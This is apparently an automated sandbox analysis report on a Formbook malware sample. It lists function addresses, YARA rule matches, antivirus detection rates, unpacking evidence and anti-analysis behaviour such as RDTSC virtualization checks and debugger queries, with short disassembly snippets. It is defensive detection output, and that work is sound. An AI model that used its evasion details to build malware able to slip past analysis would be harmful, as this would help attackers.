          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A3093_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA231B3_2_00AA231B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A033603_2_00A03360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C337D3_2_009C337D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C94B83_2_009C94B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA44963_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F841F3_2_009F841F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A024303_2_00A02430
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAD4663_2_00AAD466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B4773_2_00A0B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A165A03_2_00A165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A125813_2_00A12581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB25DD3_2_00AB25DD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FD5E03_2_009FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A106C03_2_00A106C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A056003_2_00A05600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAD6163_2_00AAD616
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E96603_2_009E9660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA67E23_2_00AA67E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB28EC3_2_00AB28EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E88E03_2_009E88E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00ABE8243_2_00ABE824
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A8303_2_00A0A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E68003_2_009E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A099BF3_2_00A099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A029903_2_00A02990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EF9003_2_009EF900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4AEF3_2_00AA4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9FA2B3_2_00A9FA2B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA5A4F3_2_00AA5A4F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1EBB03_2_00A1EBB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A8EB8A3_2_00A8EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0EB9A3_2_00A0EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A38BE83_2_00A38BE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AADBD23_2_00AADBD2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1ABD83_2_00A1ABD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB2B283_2_00AB2B28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0AB403_2_00A0AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A8CB4F3_2_00A8CB4F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A14CD43_2_00A14CD4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AACC773_2_00AACC77
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA2D823_2_00AA2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB2D073_2_00AB2D07
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E0D203_2_009E0D20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A02D503_2_00A02D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB1D553_2_00AB1D55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A91EB63_2_00A91EB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB2EF73_2_00AB2EF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A06E303_2_00A06E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A6AE603_2_00A6AE60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB1FF13_2_00AB1FF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00ABDFCE3_2_00ABDFCE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: String function: 00A75720 appears 85 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: String function: 009EB150 appears 177 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: String function: 00A3D08C appears 50 times
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.644541453.000000000250F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000002.644776222.0000000000420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647485358.0000000000ADF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.1.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.600000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@3/0@0/0
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeVirustotal: Detection: 51%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeMetadefender: Detection: 22%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe' Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.639462821.00000000023F0000.00000004.00000001.sdmp, SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeUnpacked PE file: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041684E push edi; ret 3_2_0041685B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00417AF6 push eax; retf 3_2_00417AF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00417B5D push ebp; ret 3_2_00417B5E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A3D0D1 push ecx; ret 3_2_00A3D0E4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C4288 pushad ; retf 3_2_009C4289
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C322C push eax; retf 3_2_009C321C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C225E push eax; retf 3_2_009C321C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C427E pushad ; retf 000Dh3_2_009C427F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C9271 push es; iretd 3_2_009C9278
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009CA7C0 push es; iretd 3_2_009CA7C1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009C3F9F pushad ; ret 3_2_009C3FA0

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h]3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A290AF mov eax, dword ptr fs:[00000030h]3_2_00A290AF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A1F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F0BF mov eax, dword ptr fs:[00000030h]3_2_00A1F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1F0BF mov eax, dword ptr fs:[00000030h]3_2_00A1F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9080 mov eax, dword ptr fs:[00000030h]3_2_009E9080
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E70C0 mov eax, dword ptr fs:[00000030h]3_2_009E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E70C0 mov eax, dword ptr fs:[00000030h]3_2_009E70C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA60F5 mov eax, dword ptr fs:[00000030h]3_2_00AA60F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA60F5 mov eax, dword ptr fs:[00000030h]3_2_00AA60F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA60F5 mov eax, dword ptr fs:[00000030h]3_2_00AA60F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA60F5 mov eax, dword ptr fs:[00000030h]3_2_00AA60F5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB0C7 mov eax, dword ptr fs:[00000030h]3_2_00AAB0C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB0C7 mov eax, dword ptr fs:[00000030h]3_2_00AAB0C7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E40E1 mov eax, dword ptr fs:[00000030h]3_2_009E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E40E1 mov eax, dword ptr fs:[00000030h]3_2_009E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E40E1 mov eax, dword ptr fs:[00000030h]3_2_009E40E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A14020 mov edi, dword ptr fs:[00000030h]3_2_00A14020
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1002D mov eax, dword ptr fs:[00000030h]3_2_00A1002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1002D mov eax, dword ptr fs:[00000030h]3_2_00A1002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1002D mov eax, dword ptr fs:[00000030h]3_2_00A1002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1002D mov eax, dword ptr fs:[00000030h]3_2_00A1002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1002D mov eax, dword ptr fs:[00000030h]3_2_00A1002D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67016 mov eax, dword ptr fs:[00000030h]3_2_00A67016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67016 mov eax, dword ptr fs:[00000030h]3_2_00A67016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A67016 mov eax, dword ptr fs:[00000030h]3_2_00A67016
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB02A mov eax, dword ptr fs:[00000030h]3_2_009FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB02A mov eax, dword ptr fs:[00000030h]3_2_009FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB02A mov eax, dword ptr fs:[00000030h]3_2_009FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FB02A mov eax, dword ptr fs:[00000030h]3_2_009FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1701D mov eax, dword ptr fs:[00000030h]3_2_00A1701D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB4015 mov eax, dword ptr fs:[00000030h]3_2_00AB4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AB4015 mov eax, dword ptr fs:[00000030h]3_2_00AB4015
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A73019 mov eax, dword ptr fs:[00000030h]3_2_00A73019
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E7057 mov eax, dword ptr fs:[00000030h]3_2_009E7057
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5050 mov eax, dword ptr fs:[00000030h]3_2_009E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5050 mov eax, dword ptr fs:[00000030h]3_2_009E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5050 mov eax, dword ptr fs:[00000030h]3_2_009E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA2073 mov eax, dword ptr fs:[00000030h]3_2_00AA2073
